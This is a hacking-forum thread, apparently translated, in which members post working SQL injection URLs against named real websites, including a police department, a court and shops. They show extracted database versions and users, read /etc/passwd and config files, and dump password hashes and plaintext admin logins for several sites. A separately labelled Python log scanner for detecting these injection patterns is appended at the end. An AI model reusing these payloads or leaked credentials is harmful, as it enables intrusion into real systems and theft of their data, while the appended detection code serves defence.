SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. f1ng3r

    f1ng3r [forgotten regiment]

    Code:
    http://www.amazighworld.org/news/index_show.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--
    Database Version : 4.0.24_Debian
    Database name : amazighworld_org
    User name : amazighworld_org@localhost
     
  2. Kraneg

    Kraneg Elder

    kusa.ca PR5
    Code:
    http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13/*
    DBVer:4.1.20
    User: root@localhost << I really didn't expect to see this one, but fine! =) the most interesting part is still ahead!!
    DBName:desar01_cms

    File reading works...
    /etc/passwd
    Code:
    http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/passwd'),5,6,7,8,9,10,11,12,13/*
    /etc/httpd/conf/httpd.conf (from this you can see that besides the vulnerable site there are several other sites on this server)
    Code:
    http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/httpd/conf/httpd.conf'),5,6,7,8,9,10,11,12,13/*
    Now let's see what users there are...
    Code:
    http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13+FROM+mysql.user/*
    And it turns out that root has no password at all =))) I found confirmation of this by reading the config of the local forum:
    Code:
    http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('/var/www/vs/forums.kusa.ca/Settings.php'),5,6,7,8,9,10,11,12,13/*
    =)
     
  3. f1ng3r

    f1ng3r [forgotten regiment]

    Code:
    http://emap.fm/ondemandpart.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11--
    Database Version : 5.0.32 - Debian
    Database name : emapfm
    User name : emapfm@localhost


    Code:
    http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),database(),user()),13,14--
    Database Version : 5.0.67
    Database name : cms_admin
    User name : root@localhost


    grabbing the admin:

    Code:
    http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user,password),13,14+from+mysql.user+limit+0,1--
    root:*31ECFA8D11EDEEB33BF4045DB0D8E5E158FD4A84 - couldn't crack the pass :(
     
  4. kevmen

    kevmen Member

    Code:
    http://sterlitamak.ru/arxnews.shtml?id=-880+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10/*
    version: 4.0.24_Debian-10sarge2-log
    user:adminstr@localhost
    database:adminstr
     
  5. pinky07

    pinky07 Member

    tatsud.ru SUPREME COURT OF THE REPUBLIC OF TATARSTAN =)))

    user - tatsud@localhost
    DB - BDSUD
    MySQL version - 5.0.66a

    P.S. my conscience didn't let me dig any further =))
     
  6. Kraneg

    Kraneg Elder

    abbypd.ca - PR5 - ABBOTSFORD POLICE DEPARTMENT =))) calling 911 =)
    MySQL Ver: 4.1.22
    Code:
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(version(),1,1)))=52  ->  4 (branch)
    I ran the brute force to the end and found out the exact version...
    User : apd@localhost
    Code:
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),1,1)))=97   -> a
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),2,1)))=112  -> p
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),3,1)))=100  -> d
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),4,1)))=64   -> @
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),5,1)))=108  -> l
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),6,1)))=111  -> o
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),7,1)))=99   -> c
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),8,1)))=97   -> a
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),9,1)))=108  -> l
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),10,1)))=104 -> h
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),11,1)))=111 -> o
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),12,1)))=115 -> s
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),13,1)))=116 -> t
    DB : hh_apd
    Code:
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),1,1)))=104  -> h
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),2,1)))=104  -> h
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),3,1)))=95   -> _
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),4,1)))=97   -> a
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),5,1)))=112  -> p
    http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),6,1)))=100  -> d
    Another client... on the same hosting.. =\
    tourismabbotsford.ca - PR5
    Vulnerability in:
    Code:
    http://www.tourismabbotsford.ca/index.php?page_id=291
    MySQL Ver: 4.1.22
    User : tourism@localhost
    DB : hh_tourism
     
    #7666 Kraneg, 9 Feb 2009
    Last edited: 9 Feb 2009
  7. Gorev

    Gorev Level 8

    http://www.tv.myzone.ro/index.php?mid=13[SQL]


    Version :5.0.45-log
    Database: avatarul_tvmyzone
    User: [email protected]




    blind sql...bruted
     
  8. kevmen

    kevmen Member

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),1,1))=102 f

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),2,1))=116 t

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),3,1))=101 e

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),4,1))=64 @

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),5,1))=49 1

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),6,1))=57 9

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),7,1))=50 2

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),8,1))=46 .

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),9,1))=49 1

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),10,1))=54 6

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),11,1))=56 8

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),12,1))=46 .

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),13,1))=49 1

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),14,1))=46 .

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),15,1))=51 3

    fte@192.168.1.3


    ***********************


    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1,1))=53 5

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),2,1))=46 .

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),3,1))=48 2

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),4,1))=46 1

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),5,1))=50 2

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),6,1))=50 2

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),7,1))=45 -

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),8,1))=68 D

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),9,1))=101 e

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),10,1))=98 b

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),11,1))=105 i

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),12,1))=97 a

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),13,1))=110 n

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),14,1))=95 _

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),15,1))=48 0

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),16,1))=117 u

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),17,1))=98 b

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),18,1))=117 u

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),19,1))=110 n

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),20,1))=116 t

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),21,1))=117 u

    http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),22,1))=54 6


    5.2122
    PS got bored)
     
  9. Gorev

    Gorev Level 8

    http://www.bmxmagazin.ro/index.php?ref=2&categ1=-33+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7--



    Database Version: 5.0.75-log
    Database name: bmxmagazin_website
    User name: bmxmagazin@localhost




    it's getting harder to find SQLi in the .ro domain, but that fact only makes it more interesting to me
     
  10. z00MAN

    z00MAN Banned

    here you go

    Contemporary Romanian Writers
    Code:
    http://www.romanianwriters.ro/book.php?id=-9+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())--
    user(): romanian_svc@localhost
    database(): romanian_svc 2
    version(): 5.0.67-community
     
  11. Gorev

    Gorev Level 8

    http://www.starmall.ro/magazin/?c=8&s=-34+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7

    Version : 5.0.67-community
    Database : starmall_db
    User :starmall_star@localhost



    I didn't say impossible.....
     
  12. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder

    Some homemade engine (PageRank: 4, TIC: 200):
    HTML:
    http://absolutist.ru/admin/generation/gen.game_float.php?gid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3A,user(),@@version,database()),22,23,24,25,26,27,28,29,30&pid=-1
    
     
  13. pinky07

    pinky07 Member

    takafol.ru

    user - takafol@localhost
    DB - db_takafol
    MySQL version - 4.0.23-standard
     
  14. Gorev

    Gorev Level 8

    http://www.copycomputer.ro/index.php?ref=12&id=237+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15--


    Database Version: 5.0.67-community
    Database name: copycomp_MySql
    User name: copycomp@localhost



    That's all for today, good night everyone.
     
  15. TELO

    TELO Member

    Bookstore
    Code:
    http://book.xadi.net/index.php?book=-19475%20union%20select%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11%20--
    version::4.1.22-max
    user::xadinet_xadi@localhost
    database::xadinet_db
     
  16. yarbabin

    yarbabin HACKIN YO KUT

    Code:
    http://www.godwinart.com/two.php?id=-1194+union+select+1,version(),3,4,5,6,7,8--
    5.0.67-community

    a bit of art..
     
  17. M.W.N.N.

    M.W.N.N. Member

    Federal Radio

    http://www.federalnewsradio.com/index.php/www.defenselink.mil/mtom/index.php?nid=84&sid=-1433980+union+select+1,version()/*

    version::5.0.32-Debian_7etch5-log
    user::[email protected]
    database::tags
     
  18. yarbabin

    yarbabin HACKIN YO KUT

    Code:
    http://www.ps2modchip.com.br/two.php?flag=noticias&id=-6+union+select+1,version(),3,4,5/*
    4.0.27-locaweb-log

    Code:
    http://www.parceiraagronegocios.com.br/two.php?flag=informativo&id=-2+union+select+1,version(),3--
    5.0.67-community
     
    #7678 yarbabin, 9 Feb 2009
    Last edited: 10 Feb 2009
  19. pinky07

    pinky07 Member

    www.pulse-of-reason.ru The website of some Kazan rock band)

    finding the table with the admins:
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),1,1))='112 = p
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),2,1))='117 = u
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),3,1))='108 = l
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),4,1))='115 = s
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),5,1))='101 = e
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),6,1))='111 = o
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),7,1))='102 = f
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),8,1))='114 = r
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),9,1))='101 = e
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),10,1))='97 = a
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),11,1))='115 = s
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),12,1))='111 = o
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),13,1))='110 = n
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),14,1))='95 = _
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),15,1))='97 = a
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),16,1))='100 = d
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),17,1))='109 = m
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),18,1))='105 = i
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),19,1))='110 = n
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),20,1))='0
    P.S. I looked up the column names for passwords and logins in the source of the admin login page, they very often match)

    admin login:
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),1,1))='97 = a
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),2,1))='100 = d
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),3,1))='109 = m
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),4,1))='105 = i
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),5,1))='110 = n
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),6,1))='0

    admin pass:
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),1,1))='97 = a
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),2,1))='100 = d
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),3,1))='109 = m
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),4,1))='105 = i
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),5,1))='110 = n
    http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),6,1))='0

    login - pass of the second admin: xernya - xernya
     
    1 person likes this.
  20. TELO

    TELO Member

    Office equipment store, 5.x branch
    Code:
    http://www.05.ru/catalog.php?cid=47 union select 1,concat_ws(0x3a,admin_name,admin_pass),3,4,5,6 FROM admin_users limit 1,1 --
    login:pass
    azim:4z1m


    Another office equipment store
    Code:
    http://www.ecopies.ru/showitem.php?itemid=99999+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10+FROM users+--
    admin panel
    Code:
    http://ecopies.ru/admin/
    login :: pass
    admin :: ke21pud
    you can mess around with it ))
     
    #7680 TELO, 10 Feb 2009
    Last edited: 10 Feb 2009
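As an added detection-side example (not code from any post in this thread), the Python script below scans constructed access-log lines for the two request shapes that recur above, UNION SELECT extraction with version()/user()/database()/load_file() and boolean-blind ascii(substring(...)) probing, and reports per client and path which techniques were seen and how many characters of each probed expression the blind run reached. The addresses, host paths and log lines are constructed for the example.

```python
"""Log-side detection for the two injection styles that recur in this thread:
UNION-based extraction (union select ... concat_ws/version()/user()/load_file())
and boolean-blind probing (and ascii(substring(<expr>,N,1))=<code>).
Added example, not code from any post; log lines and addresses are constructed."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined access-log format: client, request URL, status (other fields ignored).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
FINGERPRINT_RE = re.compile(r"\b(?:version|user|database|load_file)\s*\(|@@version", re.I)
# Captures the expression being read and the character position probed.
BLIND_RE = re.compile(
    r"\band\s+ascii\s*\(\s*(?:lower\s*\()?\s*substring\s*\(\s*(.+?)\s*,\s*(\d+)\s*,\s*1\s*\)", re.I)

def classify(url):
    """Return (tags, probe) for one request URL; probe is (expression, position)
    for a boolean-blind request, else None."""
    # Decode '+' and %xx so the SQL reads as the server saw it.
    sql = unquote_plus(url.split("?", 1)[1]) if "?" in url else ""
    tags = set()
    if UNION_RE.search(sql):
        tags.add("union-select")
    if FINGERPRINT_RE.search(sql):
        tags.add("db-fingerprint")
    m = BLIND_RE.search(sql)
    if m:
        tags.add("boolean-blind")
    return sorted(tags), ((m.group(1).lower(), int(m.group(2))) if m else None)

def scan(lines):
    """Per (client, path): techniques seen and, for blind probing, how many
    characters of each expression were read (highest position requested)."""
    report = defaultdict(lambda: {"tags": set(), "blind_depth": {}})
    for line in lines:
        lm = LOG_RE.match(line)
        if not lm:
            continue
        client, url, _status = lm.groups()
        tags, probe = classify(url)
        if not tags:
            continue
        entry = report[(client, url.split("?", 1)[0])]
        entry["tags"].update(tags)
        if probe:
            expr, pos = probe
            entry["blind_depth"][expr] = max(entry["blind_depth"].get(expr, 0), pos)
    return {k: {"tags": sorted(v["tags"]), "blind_depth": v["blind_depth"]}
            for k, v in report.items()}

# Constructed sample log, modelled on the request shapes quoted in the thread.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Feb/2009:21:14:02 +0300] "GET /index.php?pid=11111%27+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5/* HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/Feb/2009:21:15:10 +0300] "GET /index.php?page_id=149+and+ascii(lower(substring(user(),1,1)))=97 HTTP/1.1" 200 4800',
    '203.0.113.7 - - [09/Feb/2009:21:15:11 +0300] "GET /index.php?page_id=149+and+ascii(lower(substring(user(),2,1)))=112 HTTP/1.1" 200 4800',
    '203.0.113.7 - - [09/Feb/2009:21:15:12 +0300] "GET /index.php?page_id=149+and+ascii(lower(substring(user(),3,1)))=100 HTTP/1.1" 200 4800',
    '198.51.100.9 - - [09/Feb/2009:21:16:00 +0300] "GET /index.php?page_id=149 HTTP/1.1" 200 4800',
]
```

The blind_depth value tells an incident responder how far a character-by-character read got (here, three characters of user()), which is the figure to compare against the length of the value the attacker was after.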